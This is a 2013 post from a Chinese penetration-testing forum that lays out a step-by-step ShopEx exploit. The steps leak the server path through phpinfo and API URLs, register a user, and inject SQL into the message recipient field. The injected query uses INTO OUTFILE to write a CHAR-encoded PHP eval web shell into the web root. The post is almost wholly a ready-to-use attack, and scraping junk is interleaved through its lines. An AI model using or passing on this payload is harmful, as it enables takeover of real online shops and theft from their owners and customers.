找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 shopex前台普通用户getshell最新漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1942|回复: 0
打印 上一主题 下一主题

shopex前台普通用户getshell最新漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-27 21:28:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一个:想办法找到目标网站的绝对路径
3 u$ d; d$ Q8 G  u$ \/ I* q
8 x& a( s4 w/ Y/ k( ~$ o( N3 \% [! _http://www.political-security.com/install/svinfo.php?phpinfo=true  Z; f; F6 I+ E. @4 M" z7 D
/ a8 o. n, R; s2 a  G; F
http:/www.political-security.com/core/api/shop_api.php$ m( _- w# I3 L, X6 g
2 F1 L8 |$ O9 s: Y8 r0 E6 O
http://www.political-security.co ... api_b2b_2_0_cat.php
, b! m+ H# \: Q7 A" _2 c! S9 h7 j8 S! M: b- _3 l
http://www.political-security.com/core/ap ... b_2_0_goodstype.php8 y( `. t4 h4 H7 }0 x7 {4 D
- N" N, o7 |! d8 r$ Q
http://www.political-security.co ... i_b2b_2_0_brand.php, T. C4 _8 n' o/ X
第二个:注册一个普通用户. |9 v* [" Q* n4 y- r) p
, A( N& M0 k* `9 N0 h! W
http://www.political-security.com/?passport-signup.html
/ u  i0 f$ V4 ]: N5 @! M0 L& s
第三个: 发送消息 + K/ m( E" ?/ d* w$ H+ j5 j' u6 E
0 c: Y- P* O& A8 L! d: H( p9 x
http://www.political-security.com/?member-send.html+ q# H+ b( q$ i4 m  S; M, T
发送给中填写: k4 C/ C+ G( c, y8 F
antian365.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表